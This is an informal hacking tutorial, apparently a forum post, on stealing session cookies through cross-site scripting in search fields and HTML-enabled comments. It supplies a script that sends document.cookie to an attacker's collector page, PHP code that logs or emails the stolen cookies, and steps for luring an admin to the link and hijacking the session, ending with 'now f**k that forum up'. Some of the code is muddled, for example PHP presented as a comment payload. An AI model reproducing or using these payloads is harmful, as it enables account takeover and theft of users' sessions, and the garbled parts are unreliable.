xss can be used in 2 conditions.
sometimes there are forums that have particular fields that allow html posts..
or a vulnerability in the search field.

a vulnerable search field that allows html searches and uses $_get function instead of $_post
okay so.. lets talk about the search field first. its easier lol

testing vulnerability
write in the search bar : <script>alert("xss")</script>
now an alert message should show xss
if it didnt. than the search field is unexploitable.

now to get a link that would redirect to your cookie stealer put this in the search :

code:
<script language="javascript">
1document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
and send the link to the admin as a pm ..

cookie stealer code :

code:
<?php
$cookie = $http_get_vars["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
upload this to your host. than replace the link in the first javascript. now pm the admin or anyuser u wanna hack.

as soon as the admin opens the link. the cookie should be saved in a text file on ur host...

now download firefox and cookie editor add-on. ( i'm too lazy to post links )

put the cookies in the cookie editor and go to the website you should be logged on as admin ( if his session didnt end yet )

now f**k that forum up !

exploiting posts

you can exploit posts such as posting a comment on the admins profile ( wich allows html posts 99% of the time )

post this

code:
<?php
$cookie = $http_get_vars["cookie"];
mail("me**mydomain.com", "cookie stealer report", $cookie);
?>
change the me**mydomain.com to your email. the cookies should be mailed to you.

now as usual. add the cookies using your ***y cookie editor and than go to the website. if your lucky enough his session would not have expired yet..